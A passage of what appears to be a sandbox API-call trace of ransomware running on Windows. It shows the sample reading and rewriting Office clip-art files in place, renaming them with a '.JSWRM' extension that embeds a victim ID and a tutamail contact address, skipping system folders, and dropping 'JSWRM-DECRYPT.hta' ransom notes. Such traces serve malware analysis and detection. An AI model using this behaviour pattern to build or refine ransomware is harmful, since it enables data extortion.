dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.119] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4971) returned 1 [0100.119] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x24d210 [0100.119] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x1360, lpOverlapped=0x0) returned 1 [0100.121] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.121] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x1360, lpOverlapped=0x0) returned 1 [0100.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.121] CloseHandle (hObject=0x338) returned 1 [0100.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0100.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0100.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0100.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02214_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02214_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0100.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.122] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02218_.GIF", cAlternateFileName="")) returned 1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2=".") returned 1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="..") returned 1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="...") returned 1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="windows") returned -1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="recovery") returned 1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="perflogs") returned 1 [0100.122] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="documents and settings") returned 1 [0100.123] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.123] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="system volume information") returned 1 [0100.123] lstrcmpiW (lpString1="WB02218_.GIF", lpString2="msocache") returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02218_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02218_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02218_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0100.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02218_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02218_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02218_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02218_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.123] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3012) returned 1 [0100.123] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbc0) returned 0x24d210 [0100.124] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0xbc0, lpOverlapped=0x0) returned 1 [0100.125] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.125] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0xbc0, lpOverlapped=0x0) returned 1 [0100.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.125] CloseHandle (hObject=0x338) returned 1 [0100.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0100.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0100.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0100.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02218_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02218_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0100.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.126] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02218_.GIF", cAlternateFileName="")) returned 0 [0100.127] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0100.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0100.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0100.127] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x322db73c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x322db73c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0100.127] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0100.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.128] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x322db73c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x322db73c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0100.128] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0100.128] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0100.128] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0100.128] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Document Themes 16", cAlternateFileName="DOCUME~1")) returned 1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2=".") returned 1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="..") returned 1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="...") returned 1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="windows") returned -1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="recovery") returned -1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="perflogs") returned -1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="documents and settings") returned -1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="$RECYCLE.BIN") returned 1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="system volume information") returned -1 [0100.128] lstrcmpiW (lpString1="Document Themes 16", lpString2="msocache") returned -1 [0100.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0100.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0100.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0100.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b8f8 [0100.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0100.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\jswrm-decrypt.hta")) returned 0xffffffff [0100.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0100.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0100.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0100.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0100.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0100.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0100.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0100.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b448 [0100.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0100.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0100.131] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.131] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0100.132] CloseHandle (hObject=0x458) returned 1 [0100.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0100.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0100.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0100.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0100.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0100.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0100.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bce0 [0100.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0100.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\jswrm-decrypt.hta")) returned 0x20 [0100.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0100.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0100.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0100.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3258a1fd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0100.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.132] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3258a1fd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0100.132] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0100.132] lstrcmpiW (lpString1="..", 